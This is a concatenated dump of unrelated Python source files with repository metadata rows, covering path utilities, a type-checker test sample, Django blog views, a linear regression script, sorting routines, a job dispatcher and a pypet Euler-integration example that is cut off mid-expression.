def __init__(self, name: str, capacity: int):
self.name = name
self.capacity = capacity
self.astronauts = []
def add(self, astronaut_name: str) -> str:
if len(self.astronauts) == self.capacity:
raise ValueError(self.SPACESHIP_FULL)
if astronaut_name in self.astronauts:
raise ValueError(self.ASTRONAUT_EXISTS.format(astronaut_name))
self.astronauts.append(astronaut_name)
return self.ASTRONAUT_ADD.format(astronaut_name)
def remove(self, astronaut_name: str) -> str:
if astronaut_name not in self.astronauts:
raise ValueError(self.ASTRONAUT_NOT_FOUND.format(astronaut_name))
self.astronauts.remove(astronaut_name)
return self.ASTRONAUT_REMOVED.format(astronaut_name)
| [
"[email protected]"
] | |
a67b3be8bf770a11a0515a42fe9e37b479324764 | 297497957c531d81ba286bc91253fbbb78b4d8be | /testing/web-platform/tests/tools/manifest/utils.py | 5cd53c22e7745bd3656dadd6940aa4d5f33f4f19 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 2,232 | py | import os
import subprocess
import sys
from typing import Any, Callable, Generic, Optional, Text, TypeVar
T = TypeVar("T")
def rel_path_to_url(rel_path: Text, url_base: Text = "/") -> Text:
assert not os.path.isabs(rel_path), rel_path
if url_base[0] != "/":
url_base = "/" + url_base
if url_base[-1] != "/":
url_base += "/"
return url_base + rel_path.replace(os.sep, "/")
def from_os_path(path: Text) -> Text:
assert os.path.sep == "/" or sys.platform == "win32"
if "/" == os.path.sep:
rv = path
else:
rv = path.replace(os.path.sep, "/")
if "\\" in rv:
raise ValueError("path contains \\ when separator is %s" % os.path.sep)
return rv
def to_os_path(path: Text) -> Text:
assert os.path.sep == "/" or sys.platform == "win32"
if "\\" in path:
raise ValueError("normalised path contains \\")
if "/" == os.path.sep:
return path
return path.replace("/", os.path.sep)
def git(path: Text) -> Optional[Callable[..., Text]]:
def gitfunc(cmd: Text, *args: Text) -> Text:
full_cmd = ["git", cmd] + list(args)
try:
return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
except Exception as e:
if sys.platform == "win32" and isinstance(e, WindowsError):
full_cmd[0] = "git.bat"
return subprocess.check_output(full_cmd, cwd=path, stderr=subprocess.STDOUT).decode('utf8')
else:
raise
try:
gitfunc("rev-parse", "--show-toplevel")
except (subprocess.CalledProcessError, OSError):
return None
else:
return gitfunc
class cached_property(Generic[T]):
def __init__(self, func: Callable[[Any], T]) -> None:
self.func = func
self.__doc__ = getattr(func, "__doc__")
self.name = func.__name__
def __get__(self, obj: Any, cls: Optional[type] = None) -> T:
if obj is None:
return self
assert self.name not in obj.__dict__
rv = obj.__dict__[self.name] = self.func(obj)
obj.__dict__.setdefault("__cached_properties__", set()).add(self.name)
return rv
| [
"[email protected]"
] | |
c10025495e49e178e839ee495b8d2b7559ca3fc4 | 6b16458a0c80613a66c251511462e7a7d440970e | /packages/pyright-internal/src/tests/samples/variadicTypeVar5.py | 8089b00a89ef9b4f7adfc12be8efb3939e34e3d4 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | ikamensh/pyright | 3bbbb2cf1a1bdbbecb89ef389036756f47ef7114 | 5ea620ad2008de57dcac720a84674bdb712bffc4 | refs/heads/main | 2023-08-26T05:54:43.660282 | 2021-10-30T16:35:06 | 2021-10-30T16:35:06 | 422,952,836 | 0 | 0 | NOASSERTION | 2021-10-30T17:52:03 | 2021-10-30T17:52:02 | null | UTF-8 | Python | false | false | 2,648 | py | # This sample tests the handling of variadic type variables used
# within Callable types.
# pyright: reportMissingModuleSource=false
from typing import Any, Callable, Literal, Protocol, Union
from typing_extensions import TypeVarTuple, Unpack
_Xs = TypeVarTuple("_Xs")
def func1(func: Callable[[int, Unpack[_Xs]], Any]) -> Callable[[Unpack[_Xs]], int]:
...
def func2(func: Callable[[Unpack[_Xs]], int]) -> Callable[[Unpack[_Xs]], int]:
...
def callback1(a: int) -> int:
...
def callback2(a: str) -> int:
...
def callback3(a: str) -> None:
...
def callback4(a: int, b: complex, c: str) -> int:
...
def callback5(a: int, *args: Unpack[_Xs]) -> Union[Unpack[_Xs]]:
...
def callback6(a: int, *args: Any) -> int:
...
def callback7(a: int, b: str, c: str, d: str, *args: Any) -> int:
...
c1 = func1(callback1)
t_c1: Literal["() -> int"] = reveal_type(c1)
c1_1 = c1()
t_c1_1: Literal["int"] = reveal_type(c1_1)
# This should generate an error.
c2 = func1(callback2)
# This should generate an error.
c3 = func2(callback3)
c4 = func1(callback4)
t_c4: Literal["(complex, str) -> int"] = reveal_type(c4)
c4_1 = c4(3j, "hi")
t_c4_1: Literal["int"] = reveal_type(c4_1)
# This should generate an error.
c4_2 = c4(3j)
# This should generate an error.
c4_3 = c4(3j, "hi", 4)
c5 = func1(callback5)
t_c5: Literal["(*_Xs@callback5) -> int"] = reveal_type(c5)
# This should generate an error.
c6_1 = func1(callback6)
# This should generate an error.
c6_2 = func2(callback6)
# This should generate an error.
c7_1 = func1(callback7)
# This should generate an error.
c7_2 = func2(callback7)
class CallbackA(Protocol[Unpack[_Xs]]):
def __call__(self, a: int, *args: Unpack[_Xs]) -> Any:
...
def func3(func: CallbackA[Unpack[_Xs]]) -> Callable[[Unpack[_Xs]], int]:
...
d1 = func3(callback1)
t_d1: Literal["() -> int"] = reveal_type(d1)
# This should generate an error.
d2 = func3(callback2)
# This should generate an error.
d3 = func3(callback3)
d4 = func3(callback4)
t_d4: Literal["(complex, str) -> int"] = reveal_type(d4)
d4_1 = d4(3j, "hi")
t_d4_1: Literal["int"] = reveal_type(d4_1)
# This should generate an error.
d4_2 = d4(3j)
# This should generate an error.
d4_3 = d4(3j, "hi", 4)
def func4(func: Callable[[Unpack[_Xs], int], int]) -> Callable[[Unpack[_Xs]], int]:
...
def callback8(a: int, b: str, c: complex, d: int) -> int:
...
d5_1 = func4(callback1)
t_d5_1: Literal["() -> int"] = reveal_type(d5_1)
# This should generate an error.
d5_2 = func4(callback4)
d5_3 = func4(callback8)
t_d5_3: Literal["(int, str, complex) -> int"] = reveal_type(d5_3)
| [
"[email protected]"
] | |
f8efb8796402968e0d65adeb58b5693319539a4e | ef60f1908dba8f3854148ad1395db43a23caa850 | /libsystem/libsystem/wsgi.py | f884fcdd95b3300a8580e6a00c1f1d0ebd85e469 | [] | no_license | Richardo3/libsystem | 797403038e23778843fc7bc4146bc37eaaa11361 | 8f025a1bfd7e902b6871cac8ccbd85503de67990 | refs/heads/master | 2020-05-04T19:43:50.454937 | 2019-04-05T09:11:47 | 2019-04-05T09:11:47 | 179,405,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | """
WSGI config for libsystem project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "libsystem.settings")
application = get_wsgi_application()
| [
"[email protected]"
] | |
e87040c6a1bd846558f8c253422413cbb91f6f5f | 161daf1046832d25e66858157f95eb226ecf7cdf | /Linear Regression/Single Variable Linear Regression Manually.py | 6919d3f1af1bf449d416df7b20ca966b71574d64 | [] | no_license | Dipeshpal/Machine-Learning | 551552c0f5fc922aa6f9f5ec5d522db983ae6063 | 626516ef9f0d63a67a073eab4fc266fd6510e482 | refs/heads/master | 2022-07-05T22:19:38.050175 | 2019-07-10T09:05:31 | 2019-07-10T09:05:31 | 188,903,340 | 0 | 0 | null | 2022-06-21T22:05:10 | 2019-05-27T20:10:12 | Python | UTF-8 | Python | false | false | 2,101 | py | # Linear Regression
# Import Libraries
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
# load dataset
dataset = pd.read_csv('headbrain.csv')
# dropping ALL duplicate values
dataset.drop_duplicates(keep=False, inplace=True)
print("Dataset head: ", dataset.head())
print("Dataset shape: ", dataset.shape)
# Correlations Matrix (Visualize Relations between Data)
# From this we can find which param has more relations
correlations = dataset.corr()
sns.heatmap(correlations, square=True, cmap="YlGnBu")
plt.title("Correlations")
plt.show()
# Getting feature (x) and label(y)
# From correlations matrix we found Head Size(cm^3) and Brain Weight(grams) are most co-related data
x = dataset["Head Size(cm^3)"].values
y = dataset["Brain Weight(grams)"].values
# Fitting Line (Model) y = mx + c
# where, m = summation[(x-mean_x)(y-mean_y)]%summation[(x-mean_x)**2]
# c = y - mx
mean_x = np.mean(x)
mean_y = np.mean(y)
# Total number of features
l = len(x)
# numerator = summation[(x-mean_x)(y-mean_y)
# denominator = summation[(x-mean_x)**2
numerator = 0
denominator = 0
for i in range(l):
numerator += (x[i] - mean_x) * (y[i] - mean_y)
denominator += (x[i] - mean_x) ** 2
# m is gradient
m = numerator / denominator
# c is intercept
c = mean_y - (m * mean_x)
print("m: ", m)
print("c: ", c)
# for better visualization (Scaling of data) get max and min point of x
max_x = np.max(x) + 100
min_x = np.min(x) - 100
# X is data points (between max_x and min_y)
X = np.linspace(max_x, min_x, 10)
# model here (we know m and c, already calculated above on sample dataset)
Y = m*X + c
# plotting graph for model
plt.plot(X, Y, color='#58b970', label='Regression Line')
plt.scatter(x, y, c='#ef5424', label='Scatter Plot:n Given Data')
plt.legend()
plt.show()
# Calculate R Square
sst = 0
ssr = 0
for i in range(l):
y_pred = m * x[i] + c
sst += (y[i] - mean_y) ** 2
ssr += (y[i] - y_pred) ** 2
# print("Sum of Squared Total: ", sst)
# print("Sum of Squared due to Regression: ", ssr)
r2 = 1 - (ssr / sst)
print("R Squared: ", r2)
| [
"[email protected]"
] | |
714834b479f46b3a9ea7d245e0736f11a96e7357 | 52efcaacf23e2345d09a1de61610a74df457057f | /auto_derby/__init__.py | 7b72bc0d8b1659b8117b05e1211ef6877a5160d5 | [
"MIT"
] | permissive | debi-derby/auto-derby | 78bc726e8243c8a25ddc13b364b7289f322caaaa | c2e5c138125cac6dc13dbd74045161ca03f6e5cf | refs/heads/master | 2023-09-03T09:03:35.305321 | 2021-11-02T16:18:45 | 2021-11-02T16:18:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 55 | py | from ._config import config
from .plugin import Plugin
| [
"[email protected]"
] | |
aeb178754d3e11d4c0785eac82d396cb1a9efc7e | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/synthetic/prime-big-431.py | 6dff84319c64e9671d5fbc210e23958e95c5317e | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,705 | py | # Get the n-th prime starting from 2
def get_prime(n:int) -> int:
candidate:int = 2
found:int = 0
while True:
if is_prime(candidate):
found = found + 1
if found == n:
return candidate
candidate = candidate + 1
return 0 # Never happens
def is_prime(x:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime2(x:int, x2:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime3(x:int, x2:int, x3:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime4(x:int, x2:int, x3:int, x4:int) -> bool:
div:int = 2
$TypedVar = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
def is_prime5(x:int, x2:int, x3:int, x4:int, x5:int) -> bool:
div:int = 2
div2:int = 2
div3:int = 2
div4:int = 2
div5:int = 2
while div < x:
if x % div == 0:
return False
div = div + 1
return True
# Input parameter
n:int = 15
n2:int = 15
n3:int = 15
n4:int = 15
n5:int = 15
# Run [1, n]
i:int = 1
i2:int = 1
i3:int = 1
i4:int = 1
i5:int = 1
# Crunch
while i <= n:
print(get_prime(i))
i = i + 1
| [
"[email protected]"
] | |
6cd6e5909a0368323c8af0e4fa9a44957c2f0f36 | 5636cb0c282d03e91a830d30cec3bd54c225bd3b | /P_05_AlgorithmiqueProgrammation/03_Tris/TD_01_Bulles/programmes/tri_bulles.py | 3cb89b551a595d40d3e8a838803994b50a2c38c8 | [] | no_license | xpessoles/Informatique | 24d4d05e871f0ac66b112eee6c51cfa6c78aea05 | 3cb4183647dc21e3acbcbe0231553a00e41e4e55 | refs/heads/master | 2023-08-30T21:10:56.788526 | 2021-01-26T20:57:51 | 2021-01-26T20:57:51 | 375,464,331 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 508 | py | import random
def tri_bulles_naif(l):
for i in range(0,len(l)-1):
for j in range(0,len(l)-1):
if l[j]>l[j+1]:
l[j],l[j+1]=l[j+1],l[j]
def tri_bulles(l):
for i in range(0,len(l)-1):
for j in range(0,len(l)-i-1):
if l[j]>l[j+1]:
l[j],l[j+1]=l[j+1],l[j]
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles_naif(l)
print(l)
"""
l = [random.randint(0,10) for i in range(10)]
print(l)
tri_bulles(l)
print(l)
| [
"[email protected]"
] | |
1085ba45a8f735ea9ea5fa371a548f5de125ee1a | 781e2692049e87a4256320c76e82a19be257a05d | /all_data/exercism_data/python/leap/a3b8b55879a04bce804d9c199db55772.py | c6ce2afde394c9c920e45ec48d6cd4dde93f53ae | [] | no_license | itsolutionscorp/AutoStyle-Clustering | 54bde86fe6dbad35b568b38cfcb14c5ffaab51b0 | be0e2f635a7558f56c61bc0b36c6146b01d1e6e6 | refs/heads/master | 2020-12-11T07:27:19.291038 | 2016-03-16T03:18:00 | 2016-03-16T03:18:42 | 59,454,921 | 4 | 0 | null | 2016-05-23T05:40:56 | 2016-05-23T05:40:56 | null | UTF-8 | Python | false | false | 416 | py | __author__ = 'Ben'
# on every year that is evenly divisible by 4
# except every year that is evenly divisible by 100
# unless the year is also evenly divisible by 400
def is_leap_year(year):
if year % 4 == 0 and year % 100 == 0 and year % 400 == 0:
return True
if year % 4 == 0 and year % 100 == 0:
return False
if year % 4 == 0:
return True
else:
return False
| [
"[email protected]"
] | |
feaa11ac9c9654dcac5b82c4723fcf59931647f2 | ce60f76c6ad4c48fd6182240b302ee057809cc66 | /extra/jobqueue/dispatcher.py | a9f043e8fc7ee4f9dd606e8201f33c3083a2c6dd | [
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | bumps/bumps | 8ae10e8d15c0aa64e0bab6e00e7fabb2ca1b0860 | 2594e69567d534b434dc0eae727b77fdeff411d4 | refs/heads/master | 2023-08-22T17:56:49.987181 | 2023-07-26T14:22:23 | 2023-07-26T14:22:23 | 2,799,064 | 48 | 28 | NOASSERTION | 2023-07-26T14:22:24 | 2011-11-17T22:22:02 | Python | UTF-8 | Python | false | false | 6,471 | py |
from datetime import datetime, timedelta
import logging
from sqlalchemy import and_, or_, func, select
from sqlalchemy.exc import IntegrityError
from sqlalchemy.orm.exc import NoResultFound
from . import runjob, store, db, notify
from .db import Job, ActiveJob
class Scheduler(object):
def __init__(self):
db.connect()
def jobs(self, status=None):
session = db.Session()
if status:
jobs = (session.query(Job)
.filter(Job.status==status)
.order_by(Job.priority)
)
else:
jobs = (session.query(Job)
.order_by(Job.priority)
)
return [j.id for j in jobs]
def submit(self, request, origin):
session = db.Session()
# Find number of jobs for the user in the last 30 days
n = (session.query(Job)
.filter(or_(Job.notify==request['notify'],Job.origin==origin))
.filter(Job.date >= datetime.utcnow() - timedelta(30))
.count()
)
#print "N",n
job = Job(name=request['name'],
notify=request['notify'],
origin=origin,
priority=n)
session.add(job)
session.commit()
store.create(job.id)
store.put(job.id,'request',request)
return job.id
def _getjob(self, id):
session = db.Session()
return session.query(Job).filter(Job.id==id).first()
def results(self, id):
job = self._getjob(id)
try:
return runjob.results(id)
except KeyError:
if job:
return { 'status': job.status }
else:
return { 'status': 'UNKNOWN' }
def status(self, id):
job = self._getjob(id)
return job.status if job else 'UNKNOWN'
def info(self,id):
request = store.get(id,'request')
return request
def cancel(self, id):
session = db.Session()
(session.query(Job)
.filter(Job.id==id)
.filter(Job.status.in_('ACTIVE','PENDING'))
.update({ 'status': 'CANCEL' })
)
session.commit()
def delete(self, id):
"""
Delete any external storage associated with the job id. Mark the
job as deleted.
"""
session = db.Session()
(session.query(Job)
.filter(Job.id == id)
.update({'status': 'DELETE'})
)
store.destroy(id)
def nextjob(self, queue):
"""
Make the next PENDING job active, where pending jobs are sorted
by priority. Priority is assigned on the basis of usage and the
order of submissions.
"""
session = db.Session()
# Define a query which returns the lowest job id of the pending jobs
# with the minimum priority
_priority = select([func.min(Job.priority)],
Job.status=='PENDING')
min_id = select([func.min(Job.id)],
and_(Job.priority == _priority,
Job.status == 'PENDING'))
for _ in range(10): # Repeat if conflict over next job
# Get the next job, if there is one
try:
job = session.query(Job).filter(Job.id==min_id).one()
#print job.id, job.name, job.status, job.date, job.start, job.priority
except NoResultFound:
return {'request': None}
# Mark the job as active and record it in the active queue
(session.query(Job)
.filter(Job.id == job.id)
.update({'status': 'ACTIVE',
'start': datetime.utcnow(),
}))
activejob = db.ActiveJob(jobid=job.id, queue=queue)
session.add(activejob)
# If the job was already taken, roll back and try again. The
# first process to record the job in the active list wins, and
# will change the job status from PENDING to ACTIVE. Since the
# job is no longer pending, the so this
# should not be an infinite loop. Hopefully if the process
# that is doing the transaction gets killed in the middle then
# the database will be clever enough to roll back, otherwise
# we will never get out of this loop.
try:
session.commit()
except IntegrityError:
session.rollback()
continue
break
else:
logging.critical('dispatch could not assign job %s'%job.id)
raise IOError('dispatch could not assign job %s'%job.id)
request = store.get(job.id,'request')
# No reason to include time; email or twitter does that better than
# we can without client locale information.
notify.notify(user=job.notify,
msg=job.name+" started",
level=1)
return { 'id': job.id, 'request': request }
def postjob(self, id, results):
# TODO: redundancy check, confirm queue, check sig, etc.
# Update db
session = db.Session()
(session.query(Job)
.filter(Job.id == id)
.update({'status': results.get('status','ERROR'),
'stop': datetime.utcnow(),
})
)
(session.query(ActiveJob)
.filter(ActiveJob.jobid == id)
.delete())
try:
session.commit()
except:
session.rollback()
# Save results
store.put(id,'results',results)
# Post notification
job = self._getjob(id)
if job.status == 'COMPLETE':
if 'value' in results:
status_msg = " ended with %s"%results['value']
else:
status_msg = " complete"
elif job.status == 'ERROR':
status_msg = " failed"
elif job.status == 'CANCEL':
status_msg = " cancelled"
else:
status_msg = " with status "+job.status
# Note: no reason to include time; twitter or email will give it
# Plus, doing time correctly requires knowing the locale of the
# receiving client.
notify.notify(user=job.notify,
msg=job.name+status_msg,
level=2)
| [
"[email protected]"
] | |
eebbab8cc0fe982d9573dbef8fc19af5181a7c48 | 9b77f1e31d5901924431a2a3164312cc346bde4f | /ADI_MINI_PROJECT/blog/views.py | 77aca8b4054fcba1c1dd859c800aa3a307556c0c | [] | no_license | Adi19471/Djnago_Code-Daily | c2184bf21db5c8d4b3c4098fbd593e4949375ae8 | 03b1b70d3e187fe85eb24e88b7ef3391b14aa98c | refs/heads/master | 2023-08-14T14:36:36.144243 | 2021-09-20T12:52:46 | 2021-09-20T12:52:46 | 375,690,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,673 | py | from django.shortcuts import render,HttpResponseRedirect
from .forms import SignupForm,LoginForm,PostForm
from django.contrib import messages
from django.contrib.auth import authenticate,login,logout
from .models import Post
# home page
def home(request):
posts = Post.objects.all()
return render(request, 'blog/home.html',{'posts':posts})
#about page
def about(request):
return render(request, 'blog/about.html')
# contact page
def contact(request):
return render(request, 'blog/contact.html')
# dahsboard page
def dashbord(request):
if request.user.is_authenticated:
posts = Post.objects.all()
messages.info(request,'you enter DashBoard....!!!','dont you want dashboed then click okay')
return render(request, 'blog/dashbord.html',{'posts':posts})
else:
return HttpResponseRedirect('/login/')
# logout page
def user_logout(request):
logout(request)
return HttpResponseRedirect('/')
#signup page
def user_signup(request):
if request.method == "POST":
form = SignupForm(request.POST)
if form.is_valid():
messages.info(request,'Congratulation..!! You have become a Author')
form.save()
else:
form = SignupForm()
return render(request, 'blog/signup.html',{'form':form})
# login page
def user_login(request):
if not request.user.is_authenticated:
if request.method == "POST":
form = LoginForm(request=request, data=request.POST)
if form.is_valid():
uname = form.cleaned_data['username']
upass = form.cleaned_data['password']
user = authenticate(username=uname, password=upass)
if user is not None:
login(request, user)
messages.success(request, 'Logged in Successfully !!')
return HttpResponseRedirect('/dashbord/')
else:
form = LoginForm()
return render(request, 'blog/login.html', {'form':form})
else:
return HttpResponseRedirect('/dashbord/')
# add new post
def add_post(request):
if request.user.is_authenticated:
if request.method =='POST':
form = PostForm(request.POST)
if form.is_valid():
ti = form.cleaned_data['title']
de = form.cleaned_data['desc']
dt = form.cleaned_data['date_time']
user = Post(title=ti,desc=de,date_time=dt)
user.save()
messages.warning(request,'you go to dashboard MENU okay....?')
form = PostForm()
else:
form = PostForm()
return render(request,'blog/addpost.html',{'form':form})
else:
return HttpresponseRedirect('/login/')
# update post
def update_post(request,id):
if request.user.is_authenticated:
if request.method == 'POST':
pi = Post.objects.get(pk=id)
form = PostForm(request.POST,instance=pi)
if form.is_valid():
form.save()
else:
pi = Post.objects.get(pk=id)
form = PostForm(instance=pi)
return render(request,'blog/update.html',{'form':form})
else:
return HttpresponseRedirect('/login/')
# delete post
# def delete_post(request,id):
# if request.user.is_authenticated:
# if request.method == 'POST':
# pi = Post.objects.get(pk = id)
# pi.delete()
# return HttpresponseRedirect('/dashbord/'
# else:
# return HttpresponseRedirect('/login/')
def delete_post(request, id):
if request.user.is_authenticated:
if request.method == 'POST':
pi = Post.objects.get(pk = id)
pi.delete()
return HttpResponseRedirect('/dashbord/')
else:
return HttpResponseRedirect('/login/')
| [
"[email protected]"
] | |
3184b1daec047b0a000f90524e73ffa75afdad91 | acb8e84e3b9c987fcab341f799f41d5a5ec4d587 | /langs/4/k3t.py | 9810316e4d55d2272be6a2e8490993ef2354650e | [] | no_license | G4te-Keep3r/HowdyHackers | 46bfad63eafe5ac515da363e1c75fa6f4b9bca32 | fb6d391aaecb60ab5c4650d4ae2ddd599fd85db2 | refs/heads/master | 2020-08-01T12:08:10.782018 | 2016-11-13T20:45:50 | 2016-11-13T20:45:50 | 73,624,224 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 486 | py | import sys
def printFunction(lineRemaining):
if lineRemaining[0] == '"' and lineRemaining[-1] == '"':
if len(lineRemaining) > 2:
#data to print
lineRemaining = lineRemaining[1:-1]
print ' '.join(lineRemaining)
else:
print
def main(fileName):
with open(fileName) as f:
for line in f:
data = line.split()
if data[0] == 'k3T':
printFunction(data[1:])
else:
print 'ERROR'
return
if __name__ == '__main__':
main(sys.argv[1]) | [
"[email protected]"
] | |
35a9a876dc10d8de63623e6d3d37890bb3842900 | bea3febeda4c0688dfbb2db584ab4f7d710040e0 | /django/cbv/person/views.py | c954514b57714390b9b1210f810dd5c51ab31499 | [] | no_license | airpong/TIL-c9 | c471ac73e23716cf677ba590dd6099e584c42883 | 069cc53820a09cd9787765ad41ba7e792dc342b5 | refs/heads/master | 2022-12-12T22:26:23.147651 | 2019-06-27T08:24:44 | 2019-06-27T08:24:44 | 166,777,129 | 0 | 0 | null | 2022-11-22T03:46:57 | 2019-01-21T08:34:01 | Python | UTF-8 | Python | false | false | 999 | py | from django.shortcuts import render,redirect
from .models import Person
from .forms import PersonForm
from django.views.generic import ListView,CreateView
from django.contrib.auth.mixins import LoginRequiredMixin
# Create your views here.
# def list(request):
# people = Person.objects.all()
# return render(request,'person/person_list.html',{'people':people})
class PersonList(ListView):
model = Person
context_object_name = 'people'
# def create(request):
# if request.method == 'GET':
# form = PersonForm()
# return render(request,'person/person_form.html',{'form':form})
# else:
# last_name = request.POST.get('last_name')
# email = request.POST.get('email')
# age = request.POST.get('age')
# Person.objects.create(last_name=last_name,email=email,age=age)
# return redirect('list')
class PersonCreate(LoginRequiredMixin,CreateView):
model = Person
form_class = PersonForm
success_url = '/person/' | [
"[email protected]"
] | |
1bea9bc3616fe721a74dbcd53630aec212558032 | 8420f7c680f1b3b66d7f903b9986fdd533ce63d9 | /examples/example_05_custom_parameter.py | ac1416041fcbbc99d18abbfcf8370ba211ebd2c4 | [
"BSD-3-Clause"
] | permissive | ilonajulczuk/pypet | 9cef890cc856a769441aef983e4367fee56d1d12 | 99dd37243c30178d3dc02798dcc6aa9320b6c213 | refs/heads/master | 2020-12-26T11:21:16.691896 | 2014-04-16T07:53:37 | 2014-04-16T07:53:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,240 | py | __author__ = 'Robert Meyer'
import numpy as np
import inspect
from pypet.environment import Environment
from pypet.parameter import Parameter, ArrayParameter
from pypet.trajectory import Trajectory
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
# Here we will see how we can write our own custom parameters and how we can use
# it with a trajectory.
# Now we want to do a more sophisticated simulations, we will integrate a differential equation
# with an Euler scheme
# Let's first define our job to do
def euler_scheme(traj, diff_func):
"""Simulation function for Euler integration.
:param traj:
Container for parameters and results
:param diff_func:
The differential equation we want to integrate
"""
steps = traj.steps
initial_conditions = traj.initial_conditions
dimension = len(initial_conditions)
# This array will collect the results
result_array = np.zeros((steps,dimension))
# Get the function parameters stored into `traj` as a dictionary
# with the (short) names as keys :
func_params_dict = traj.func_params.f_to_dict(short_names=True, fast_access=True)
# Take initial conditions as first result
result_array[0] = initial_conditions
# Now we compute the Euler Scheme steps-1 times
for idx in range(1,steps):
result_array[idx] = diff_func(result_array[idx-1], **func_params_dict) * traj.dt + \
result_array[idx-1]
# Note the **func_params_dict unzips the dictionary, it's the reverse of **kwargs in function
# definitions!
#Finally we want to keep the results
traj.f_add_result('euler_evolution', data=result_array, comment='Our time series data!')
# Ok, now we want to make our own (derived) parameter that stores source code of python functions.
# We do NOT want a parameter that stores an executable function. This would complicate
# the problem a lot. If you have something like that in mind, you might wanna take a look
# at the marshal (http://docs.python.org/2/library/marshal) module
# or dill (https://pypi.python.org/pypi/dill) package.
# Our intention here is to define a parameter that we later on use as a derived parameter
# to simply keep track of the source code we use ('git' would be, of course, the better solution
# but this is just an illustrative example)
class FunctionParameter(Parameter):
# We can go for a a cheap solution and make use of the function `_convert_data` of the parent.
# This gets called before adding data to the parameter to turn numpy arrays
# into read-only numpy arrays. But we will use the function for our purpose to extract
# the source code:
def _convert_data(self, val):
if callable(val):
return inspect.getsource(val)
else:
return super(FunctionParameter,self)._convert_data(val)
# For more complicate parameters you might consider implementing:
# `f_supports` (we do not need it since we convert the data to stuff the parameter already
# supports, and that is strings!)
#
# and
# the private functions
#
# `_values_of_same_type` (to tell whether data is similar, i.e. of two data items agree in their
# type, this is important to only allow exploration within the same dimension.
# For instance, a parameter that stores integers, should only explore integers etc.)
#
# and
#
# `_equal_values` (to tell if two data items are equal. This is important for merging if you
# want to erase duplicate parameter points. The trajectory needs to know when a
# parameter space point was visited before.)
#
# and
#
# `_store` (to be able to turn complex data into basic types understood by the storage service)
#
# and
#
# `_load` (to be able to recover your complex data form the basic types understood by the storage
# service)
#
# But for now we will rely on the parent functions and hope for the best!
# Ok now let's follow the ideas in the final section of the cookbook and let's
# have a part in our simulation that only defines the parameters.
def add_parameters(traj):
"""Adds all necessary parameters to the `traj` container"""
traj.f_add_parameter('steps', 10000, comment='Number of time steps to simulate')
traj.f_add_parameter('dt', 0.01, comment='Step size')
# Here we want to add the initial conditions as an array parameter. We will simulate
# a 3-D differential equation, the Lorenz attractor.
traj.f_add_parameter(ArrayParameter,'initial_conditions', np.array([0.0,0.0,0.0]),
comment = 'Our initial conditions, as default we will start from'
' origin!')
# We will group all parameters of the Lorenz differential equation into the group 'func_params'
traj.f_add_parameter('func_params.sigma', 10.0)
traj.f_add_parameter('func_params.beta', 8.0/3.0)
traj.f_add_parameter('func_params.rho', 28.0)
#For the fun of it we will annotate the group
traj.func_params.v_annotations.info='This group contains as default the original values chosen ' \
'by Edward Lorenz in 1963. Check it out on wikipedia ' \
'(https://en.wikipedia.org/wiki/Lorenz_attractor)!'
# We need to define the lorenz function, we will assume that the value array is 3 dimensional,
# First dimension contains the x-component, second y-component, and third the z-component
def diff_lorenz(value_array, sigma, beta, rho):
"""The Lorenz attractor differential equation
:param value_array: 3d array containing the x,y, and z component values.
:param sigma: Constant attractor parameter
:param beta: FConstant attractor parameter
:param rho: Constant attractor parameter
:return: 3d array of the Lorenz system evaluated at `value_array`
"""
diff_array = np.zeros(3)
diff_array[0] = sigma * (value_array[1]-value_array[0])
diff_array[1] = value_array[0] * (rho - value_array[2]) - value_array[1]
diff_array[2] = value_array[0] * value_array[1] - beta * value_array[2]
return diff_array
# And here goes our main function
def main():
env = Environment(trajectory='Example_05_Euler_Integration',
filename='experiments/example_05/HDF5/example_05.hdf5',
file_title='Example_05_Euler_Integration',
log_folder='experiments/example_05/LOGS/',
comment = 'Go for Euler!')
traj = env.v_trajectory
trajectory_name = traj.v_name
# 1st a) phase parameter addition
add_parameters(traj)
# 1st b) phase preparation
# We will add the differential equation (well, its source code only) as a derived parameter
traj.f_add_derived_parameter(FunctionParameter,'diff_eq', diff_lorenz,
comment='Source code of our equation!')
# We want to explore some initial conditions
traj.f_explore({'initial_conditions' : [
